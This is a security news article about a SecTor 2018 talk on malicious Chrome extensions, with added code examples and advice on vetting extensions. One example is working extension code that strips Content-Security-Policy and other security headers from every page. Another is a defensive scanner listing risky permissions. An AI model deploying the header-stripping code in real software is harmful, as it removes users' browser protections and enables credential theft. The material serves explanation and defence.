You may trust your browser, but do you trust what it’s running? At SecTor 2018, threat intelligence specialist Lilly Chalupowski demonstrated why you shouldn’t.

Browser extensions are the small applications that your browser installs to provide extra features. These can do anything from translating web sites to letting you download videos from streaming sites. These extensions can be a huge problem.

When your best friend brings a new friend of theirs to your party, you assume that this new person will be well behaved. Most of the time, you’ll be right, because you trust your friend’s character judgements.

Trust no one

Browsers and extensions are the same. Your operating system already trusts the browser, which means it also trusts whatever extra software the browser brings to the party, just as you do when you open the door to your best friend and their +1.

Occasionally, though, things go wrong. You’ll find that new party guest cooking crystal meth in your bathroom having broken open and pocketed your framed collection of memorial coins. Awkward.

The same is true of browser extensions. Depending on the permissions they are granted, they can see every URL you visit along with the data that travels to and from those sites, and they can inject JavaScript into the pages your browser loads. Giving them unfettered access to your web traffic opens you up to attack.

As a security application developer in threat intelligence at GoSecure, Chalupowski spends her days thinking her way inside attackers’ heads. Her experience as a penetration tester has made her adept at identifying and documenting new attack vectors.

Chrome enforces several mechanisms intended to limit what code running in the browser, extensions included, can do. Content Security Policy lets a site say where scripts may be loaded from; extensions run in a sandbox; and Cross-Origin Resource Sharing lets a site decide which requests from other origins it will accept. Much of this is governed by security headers that web sites send in their HTTP responses and that Chrome is expected to honour.

Overriding security headers

Chalupowski blew right through those measures in her talk at SecTor 2018 using little more than a simple script.

“I can nuke what’s there and take it all out,” she says. “I thought there would have been something to prevent that but there’s not.”

In her talk, Chalupowski used JavaScript small enough to fit on one presentation slide: it matched the security headers in the browser's HTTP traffic with simple regular expressions and stripped them out.

She then had the malicious extension talk to a command-and-control server, sending plaintext login credentials from a banking site. The C&C server could also send malicious code back to the browser; in her demo, it triggered an alert box.
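The header-stripping step described above, reconstructed as an added example: this is not Chalupowski's slide code and not anything from the page. It assumes a Manifest V2 extension that holds the `webRequest`, `webRequestBlocking` and `<all_urls>` permissions (an assumption; the page does not list her manifest), because that is what lets a listener rewrite response headers before the page ever sees them. The header list and the sample response are constructed for the demo.

```javascript
// Added example, not the speaker's code: a reconstruction of the
// header-stripping technique the talk describes. Assumes a Manifest V2
// extension with "webRequest", "webRequestBlocking" and "<all_urls>"
// permissions (assumption, not stated on the page).

// Response headers that a malicious extension would want gone, matched
// case-insensitively. Removing Content-Security-Policy is what lets injected
// script run on a page that would otherwise refuse it.
const SECURITY_HEADER_RE =
  /^(content-security-policy(-report-only)?|x-frame-options|strict-transport-security|x-content-type-options|referrer-policy|cross-origin-(opener|embedder|resource)-policy)$/i;

// Takes the `responseHeaders` array Chrome hands an onHeadersReceived listener
// ([{name, value}, ...]) and returns the survivors plus what was dropped.
function stripSecurityHeaders(responseHeaders) {
  const kept = [];
  const removed = [];
  for (const header of responseHeaders) {
    if (SECURITY_HEADER_RE.test(header.name)) {
      removed.push(header.name);
    } else {
      kept.push(header);
    }
  }
  return { responseHeaders: kept, removed };
}

// The listener shape: returning an object with `responseHeaders` tells Chrome
// to replace the headers on the response with the ones supplied.
function onHeadersReceived(details) {
  const { responseHeaders } = stripSecurityHeaders(details.responseHeaders || []);
  return { responseHeaders };
}

// Registration as it would appear in an MV2 background script. Guarded so the
// same file also runs under Node for the demo below.
if (typeof chrome !== "undefined" && chrome.webRequest) {
  chrome.webRequest.onHeadersReceived.addListener(
    onHeadersReceived,
    { urls: ["<all_urls>"] },
    ["blocking", "responseHeaders"]
  );
}

// Constructed sample: headers a bank's login page might send.
const SAMPLE_RESPONSE_HEADERS = [
  { name: "Content-Type", value: "text/html; charset=utf-8" },
  { name: "Content-Security-Policy", value: "default-src 'self'; script-src 'self'" },
  { name: "X-Frame-Options", value: "DENY" },
  { name: "Strict-Transport-Security", value: "max-age=31536000; includeSubDomains" },
  { name: "Set-Cookie", value: "session=abc123; Secure; HttpOnly" },
];

if (typeof require !== "undefined" && require.main === module) {
  const result = stripSecurityHeaders(SAMPLE_RESPONSE_HEADERS);
  console.log("removed:", result.removed);
  console.log("kept:", result.responseHeaders.map((h) => h.name));
}
```

Run under Node, the demo reports Content-Security-Policy, X-Frame-Options and Strict-Transport-Security removed and only Content-Type and Set-Cookie surviving. Two caveats for anyone checking their own browser: nothing here is exotic, the listener is a documented API, and the `blocking` form of `webRequest` was removed from Manifest V3, where `declarativeNetRequest` rules can still modify headers but within tighter limits.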

We sat down with Chalupowski to talk more about what she found:

Google does its best to catch malicious extensions in the Chrome Web Store, using machine learning among other checks. Nevertheless, some still slip through and compromise thousands of users, effectively turning the Chrome Web Store into a massive watering hole.

In January 2018, researchers at Gigamon’s applied threat research team found four malicious Chrome extensions that had compromised 500,000 users. Although the extensions did not contain malicious code themselves, they enabled their author to inject and run arbitrary JavaScript code from a C&C server. In that case, the attacker was probably using the extension for click fraud, the team suggested.

That same month, researchers found a malicious add-on called Tiempo en colombia en vivo which, just like our unwanted party guest, refused to leave. It used a simple redirect to stop users from reaching the browser's list of installed extensions, which made it almost impossible to remove.

Often, crooks will use social engineering techniques like phishing to get these extensions onto unwitting users’ systems. One such scam, posing as an anti-cryptojacking extension, was found stealing victims’ private cryptocurrency keys in March 2019.

How to protect yourself

How can you protect yourself against dodgy extensions in Chrome and other browsers? As Chalupowski says in our interview, checking the extension's store page and looking for reviews is a good step. Looking for a developer web site and checking its support page and privacy policy, if it has one, is also good cyberhygiene. Another useful port of call is CRXcavator, which you can use to scan Chrome extensions by their IDs.

These steps alone aren't enough, though: the fact that no one has found malicious activity in an extension doesn't mean there is none. Look at the permissions an extension asks for, both at install time and afterwards on the browser's extensions page; an extension that wants to read and change data on all web sites deserves more scrutiny than one confined to a single domain. For extra protection, limit the number of extensions you install and regularly review those already installed, removing any you no longer use. Reducing your attack surface is an important step for any browser user.
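One way to make that review concrete, as an added example that is neither the page's own advice nor CRXcavator's scanner: read an extension's manifest.json and flag the capabilities behind the attacks described above, namely broad host access, the header-rewriting permissions, content scripts injected into every page, and a manifest Content Security Policy that lets the extension load script from a remote server (the mechanism in the Gigamon case). Which keys count as risky is my own judgement, an assumption rather than a published scheme, and both manifests are constructed samples.

```javascript
// Added example, not from the page or from CRXcavator: a reviewer for an
// extension's manifest.json. The risk list below is my own (assumption).

// Permissions that give an extension broad reach, with why each matters.
const RISKY_PERMISSIONS = {
  "<all_urls>": "can read and modify traffic to every site",
  webRequest: "can observe every request the browser makes",
  webRequestBlocking: "can alter or drop requests and response headers in flight (MV2)",
  declarativeNetRequest: "can rewrite headers with rules (the MV3 replacement)",
  tabs: "can read the URL and title of every open tab",
  cookies: "can read cookies, including session cookies, for permitted hosts",
  clipboardRead: "can read whatever the user copies",
  nativeMessaging: "can talk to a native program outside the browser sandbox",
};

// Host patterns that mean "every site", whether they appear in permissions
// (MV2), host_permissions (MV3) or content_scripts[].matches.
const EVERY_SITE_RE = /^(<all_urls>|\*:\/\/\*\/\*|https?:\/\/\*\/\*)$/;

// A manifest-level CSP whose script-src names a remote origin lets the
// extension run code it did not ship with, fetched from a server.
const REMOTE_SCRIPT_RE = /script-src[^;]*\bhttps?:/i;

function reviewManifest(manifest) {
  const findings = [];
  let touchesEverySite = false;
  const perms = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.optional_permissions || []),
  ];
  for (const p of perms) {
    if (Object.prototype.hasOwnProperty.call(RISKY_PERMISSIONS, p)) {
      findings.push(`permission ${p}: ${RISKY_PERMISSIONS[p]}`);
    } else if (EVERY_SITE_RE.test(p)) {
      findings.push(`host pattern ${p}: applies to every site`);
    }
    if (EVERY_SITE_RE.test(p)) touchesEverySite = true;
  }
  for (const script of manifest.content_scripts || []) {
    for (const m of script.matches || []) {
      if (EVERY_SITE_RE.test(m)) {
        findings.push(`content script injected into every page (${m})`);
        touchesEverySite = true;
      }
    }
  }
  const csp = manifest.content_security_policy;
  if (typeof csp === "string" && REMOTE_SCRIPT_RE.test(csp)) {
    findings.push("manifest CSP allows a remote script-src: extension can load code from a server");
  }
  return { touchesEverySite, findings };
}

// Constructed sample: the kind of manifest a header-stripping extension needs.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "Video Downloader (constructed sample)",
  version: "1.0",
  permissions: ["webRequest", "webRequestBlocking", "<all_urls>", "storage"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["inject.js"] }],
  background: { scripts: ["background.js"] },
  content_security_policy: "script-src 'self' https://cdn.example.net; object-src 'self'",
};

// Constructed sample: a narrowly scoped MV3 extension for comparison.
const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: "Translate One Site (constructed sample)",
  version: "1.0",
  permissions: ["storage"],
  host_permissions: ["https://translate.example.com/*"],
};

if (typeof require !== "undefined" && require.main === module) {
  for (const m of [SAMPLE_MANIFEST, BENIGN_MANIFEST]) {
    const report = reviewManifest(m);
    console.log(`${m.name}: every site = ${report.touchesEverySite}`);
    for (const f of report.findings) console.log("  -", f);
  }
}
```

Point it at the manifest.json inside an unpacked extension directory and it gives you the same questions the store page should have prompted: can this thing see every site, can it rewrite what those sites send, and can its author change its behaviour without shipping an update. A clean report is not a clean bill of health, only the absence of the obvious.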
